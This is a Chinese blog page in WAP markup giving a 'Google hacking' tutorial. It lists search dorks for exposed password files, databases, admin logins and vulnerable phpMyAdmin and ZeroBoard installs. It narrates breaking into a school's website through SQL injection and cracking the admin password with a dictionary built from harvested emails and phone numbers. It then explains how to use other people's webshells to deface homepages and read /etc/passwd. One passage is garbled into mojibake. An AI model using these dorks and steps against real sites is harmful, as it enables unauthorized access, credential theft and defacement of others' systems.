<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
<head>
<meta http-equiv="Cache-Control" content="max-age=0"/>
</head>
<card id="wapview" title="日志内容">
-- 日志内容 --<p>实并非 <br/><br/>如此简单... <br/><br/>google hacking的简单实现 本文是我通过网上收集整理。若有漏洞和不全面的地方还请多多指教！！！！！！！ <br/><br/>google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.google hacking其<br/>使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法. <br/>intext: <br/>这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页 <br/><br/>.allintext:使用方法和intext类似. <br/><br/>intitle: <br/>和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网 <br/><br/>页.同理allintitle:也同intitle类似. <br/><br/>cache: <br/>搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦. <br/><br/>define: <br/>搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义. <br/><br/>filetype: <br/>这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特勘杲行畔⑹占夹枰玫秸飧?搜索指定类型的文件.例如输入 <br/><br/>:filetype:doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富 <br/><br/>info: <br/>查找指定站点的一些基本信息. <br/><br/>inurl: <br/>搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接:http://www.xxx.com/xxx/admin,用来找管理员登 <br/><br/>陆的URL不错.allinurl也同inurl类似,可指定多个字符. <br/><br/>link: <br/>例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL. <br/><br/>site: <br/>这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL. <br/><br/><br/>对了还有一些*作符也是很有用的: <br/>+ 把google可能忽略的字列如查询范围 <br/>- 把某个字忽略 <br/>~ 同意词 <br/>. 单一的通配符 <br/>* 通配符，可代表多个字母 <br/>"" 精确查询 <br/><br/>下面开始说说实际应用 <br/><br/>以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.而google正因为其强大的搜索能力往往会 <br/><br/>把一些敏感信息透露给他们.用google搜索以下内容: <br/>intitle:"index of" etc <br/>intitle:"Index of" .sh_history <br/>intitle:"Index of" .bash_history <br/>intitle:"index of" passwd <br/>intitle:"index of" people.lst <br/>intitle:"index of" pwd.db <br/>intitle:"index of" etc/shadow <br/>intitle:"index of" spwd <br/>intitle:"index of" master.passwd <br/>intitle:"index of" htpasswd <br/>"# -FrontPage-" inurl:service.pwd <br/>有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的 <br/><br/><br/>同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,可以用google来找网上使用这套程序的站 <br/><br/>点: <br/>intext:ZeroBoard filetype:php <br/>或者使用: <br/>inurlutlogin.php?_zb_path= site:.jp <br/>来寻找我们所需要的页面.phpmyadmin是一套功能强大的数据库*作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进 <br/><br/>行*作.我们可以用google搜索存在这样漏洞的程序URL: <br/>intitle:phpmyadmin intext:Create new database <br/><br/>还记http://www.xxx.com/_vti_bin/..%5 ... ystem32/cmd.exe?dir吗?用google找找，你也许还可以找到很多 <br/><br/>古董级的机器。同样我们可以用这个找找有其他cgi漏洞的页面。 <br/>allinurl：winnt system32 <br/><br/>前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件 <br/><br/>等等).举个例子示例一下: <br/>allinurl:bbs data <br/>filetype:mdb inurl:database <br/>filetype:inc conn <br/>inurl:data filetype:mdb <br/>intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情况,和上面的原理一样,我们还可以用google来找后 <br/><br/>台. <br/><br/><br/>利用google完全是可以对一个站点进行信息收集和渗透的，下面我们用google对特定站点进行一次测试。 <br/>首先用google先看这个站点的一些基本情况(一些细节部分就略去了): <br/>site:xxxx.com <br/>从返回的信息中，找到几个该校的几个系院的域名： <br/>http://a1.xxxx.com <br/>http://a2.xxxx.com <br/>http://a3.xxxx.com <br/>http://a4.xxxx.com <br/>顺便ping了一下，应该是在不同的服务器.学校一般都会有不少好的资料，先看看有什么好东西没 <br/><br/>site:xxxx.com filetype:doc <br/>得到N个不错的doc。 <br/><br/>先找找网站的管理后台地址： <br/>site:xxxx.com intext:管理 <br/>site:xxxx.com inurl:login <br/>site:xxxx.com intitle:管理 <br/>超过获得2个管理后台地址： <br/>http://a2.xxxx.com/sys/admin_login.asp <br/>http://a3.xxxx.com:88/_admin/login_in.asp <br/><br/>还算不错，看看服务器上跑的是什么程序： <br/>site:a2.xxxx.com filetype:asp <br/>site:a2.xxxx.com filetype:php <br/>site:a2.xxxx.com filetype:aspx <br/>site:a3.xxxx.com filetype:asp <br/>site:....... <br/>...... <br/>a2服务器用的应该是IIS，上面用的是asp的整站程序，还有一个php的论坛 <br/>a3服务器也是IIS，aspx+asp。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的： <br/>site:a2.xxxx.com intext:ftp://*:* <br/>没找到什么有价值的东西。再看看有没有上传一类的漏洞： <br/>site:a2.xxxx.com inurl:file <br/>site:a3.xxxx.com inurl:load <br/>在a2上发现一个上传文件的页面： <br/>http://a2.xxxx.com/sys/uploadfile.asp <br/>用IE看了一下，没权限访问。试试注射， <br/>site:a2.xxxx.com filetype:asp <br/>得到N个asp页面的地址，体力活就让软件做吧，这套程序明显没有对注射做什么防范，dbowner权限，虽然不高但已足矣，back a shell不太喜 <br/><br/>欢，而且看起来数据库的个头就不小，直接把web管理员的密码暴出来再说，MD5加密过。一般学校的站点的密码都比较有规律，通常都是域名+ <br/><br/>电话一类的变形，用google搞定吧。 <br/>site:xxxx.com //得到N个二级域名 <br/>site:xxxx.com intext:*@xxxx.com //得到N个邮件地址，还有邮箱的主人的名字什么的 <br/>site:xxxx.com intext:电话 //N个电话 <br/>把什么的信息做个字典吧，挂上慢慢跑。过了一段时间就跑出4个帐号，2个是学生会的，1个管理员，还有一个可能是老师的帐号。登陆上去： <br/>name：网站管理员 <br/>pass：a2xxxx7619 //说了吧，就是域名+4个数字 <br/>要再怎么提权那就不属于本文讨论访问了，呵呵，到此为止。 <br/><br/><br/>这段时间在国外的一些google hack的研究站点看了看，其实也都差不多是一些基本语法的灵活运用，或者配合某个脚本漏洞，主要还是靠 <br/><br/>个人的灵活思维。国外对于google hack方面的防范也并不是很多，所以大家还是点到为止，不要去搞破坏拉，呵呵。对于一些在win上跑 <br/>apache的网管们应该多注意一下这方面，一个intitle:index of就差不多都出来了 <br/>1.查找利用php webshell <br/><br/>intitle:"php shell*" "Enable stderr" filetype:php <br/><br/>(注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中，你能找到很多直接在机器上执 <br/><br/>行命令的web shell来。如果找到的PHPSHELL不会利用，如果你不熟悉UNIX，可以直接看看LIST，这里就不详细说了，有很多利用价值。要说明 <br/><br/>的是，我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令，都是system调用出来的函数(其实用百度及其他搜索引擎都可以，只是填 <br/><br/>写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了: <br/><br/><br/>echo "召唤" &gt; index.jsp <br/><br/><br/>现在看看首页，已经被我们改成: "召唤" 了。 <br/><br/>我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file &gt; index.html or echo "" &gt; file <br/><br/>echo "test" &gt;&gt; file <br/><br/>这样一条条打出来，站点首页就成功被替换了。同样的也可以 <br/><br/><br/>uname -a;cat /etc/passwd <br/><br/>不过有点要注意，有些WEBSHELL程序有问题，执行不了的， <br/><br/>2.搜索INC敏感信息 <br/><br/>在google的搜索框中填入: <br/><br/>Code: <br/><br/>.org filetype:inc <br/></p><br/><a href="wapblog.asp">返回</a> | <a href="index.asp">首页</a>
</card>
</wml>